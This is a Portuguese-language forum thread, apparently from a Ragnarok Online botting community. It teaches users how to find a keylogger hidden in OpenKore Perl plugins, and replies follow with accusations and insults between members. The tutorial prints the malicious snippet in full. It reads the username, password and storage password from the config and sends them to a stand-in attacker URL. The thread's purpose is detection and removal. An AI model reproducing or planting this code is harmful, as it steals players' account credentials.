[Tutorial] Identificando Keylogger no Openkore

[__Cronos__ 0]

O que é um keylogger? É um "programa" simples, desenvolvido com o propósito de capturar o que digitou e enviar para aquele que desenvolveu ( ou configurou ). Hoje em dia há diversas maneiras de acabar sendo vítima de um ''programinha'' desses: Desde um clique em um simples executável até uma invasão bem elaborada. E a melhor forma de evitar executáveis como estes é utilizar um bom antivirus, caso não tenha, utilize este site: http://www.virustotal.com

 

Como detectar um keylogger "indetectável", já se tratando de bots?

Os keyloggers usados em bots são dividos muitas vezes em 3 partes, sendo elas:

 

1. Plugin em .pl que vem com o bot.

2. Arquivo .php que fica localizado no site do "hacker/cracker ( na verdade é lammer )".

3. Arquivo .txt que fica também no site do atacante.

 

Tudo isso funciona da seguinte maneira:

Ao rodar o bot, o plugin com código malicioso é executado, ele pega suas informações como: Login, senha e senha de armazém, salva em algumas variáveis e envia para o site do atacante.

O arquivo .php escreve todas essas informações no .txt, e assim o atacante pega suas informações.

 

Para detectar esse código malicioso em .pl ( perls ), vá na pasta de seu openkore e em seguida entre na pasta plugins, lá como já sabem, estão seus plugins.

Abra um por um, aperte CTRL+F e procure por este código:

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://www.atacante.com/key_strokes.php?keylog=$usuario $senha $kafra")

 

Se por acaso encontrar este código, significa que o bot tem "keylogger", e certamente se executa-lo todas as suas informações serão enviadas para o site do atacante. Para remover o keylogger, apenas apague essas linhas.

 

Conclusão:

Sempre baixe os bots de fontes seguras :smiley:

 

Créditos:Slogra

[andersonmellooo 0]

não existe apenas esta maneira de colocar keylogger no openkore!

Esta maneira é apenas a mais conhecida! Mas tem varias outras maneiras de obter dados de quem usa openkore infectado! Mas não vou ficar dando aulas de como se prevenir! Quem realmente não uqer ter sua conta zerada não baixe jamais nunca em hipotese alguma o openkore postado pelo saruesley pois o keylogger que ele utiliza não é desta maneira! Kkk ...

[__Cronos__ 0]

Ainda bem que nunca usei Openkore em minha acc original so crio uma conta LUG e contas proprias para o bot :pensativo:

 

tava vendo uns comentarios que quem tenta falar que existi keylogg no openkore do saruley tem o Tópico fechado pra ninguem ficar sabendo >.<

 

Sera que o keylogg dele que o povo tanto fala pega so oque ta programado no CONFIG.TXT ou qualquer conta que loga no rag a parti do PC infectado ?>.<

[saruesley *-* 33]

Ai meu Deus do céu, o anderson fala que tem kl e bla bla bla e mimi mimi mimi... E nunca jamais provou nada contra mim.

E eu realmente pedi para fechar o tópico, não foi para deixar a poeira baixar e voltar a postar bot "infectado" como você diz. Simplesmente parei de postar por falta de tempo e por estar de saco cheio de gentinha igual a você.

E cade que depois que me expus como moderador do fórum você veio falar alguma coisa diretamente para mim tanto aqui quanto no fórum da OPK?

 

Então fica caladinho e deixa de recalque maluco.

 

E Cronus, e claro que todo KL vai pegar o que está na config.txt ou você coloca suas informações de usuário e senha no arquivo de shop.txt?

[andersonmellooo 0]

Ai meu Deus do céu, o anderson fala que tem kl e bla bla bla e mimi mimi mimi... E nunca jamais provou nada contra mim.

E eu realmente pedi para fechar o tópico, não foi para deixar a poeira baixar e voltar a postar bot "infectado" como você diz. Simplesmente parei de postar por falta de tempo e por estar de saco cheio de gentinha igual a você.

E cade que depois que me expus como moderador do fórum você veio falar alguma coisa diretamente para mim tanto aqui quanto no fórum da OPK?

 

Então fica caladinho e deixa de recalque maluco.

 

E Cronus, e claro que todo KL vai pegar o que está na config.txt ou você coloca suas informações de usuário e senha no arquivo de shop.txt?

 

Agora sim mano!! kkkkkk.... sarevok kkk mas tu é um baba ovo mesmo hein! se o revok tomar banho de bacia você morre afogado! de tyão baba ovo que você e kkkk....

e não pense que vou ficar com medo de você por você ser moderador do forumBR amigão!

Quando te Invoquei no Shout e vc respondeu! eu so fui ver na manhã de hoje porque ontem quando você me respondeu eu estava dormindo né guerreiro.

ai hoje entrei e alguem me falou que você me respondeu.

e fui no seu perfil ver seu chatbox.

quer saber que se dane... vo continuar batendo de frente kkkk... SEM MAIS...

Manda ai algum moderador fechar essa bosta aqui seu MERDA!

[606057 0]

Não entendo essas pessoas que usam programas ilegais e depois reclamam que foram hackeadas.

[buzzfanatic 0]

Sempre usei o bot do sarusley, e só o dele, nenhum outro e mais nada que nao fosse dos tópicos dele, ainda sim já tive todas as contas do bot hackeadas pelo menos 1 vez...fazer o que né...o jeito é deixar o char do bot sem nenhum equip util ou zeny pra ele não ter o que pegar...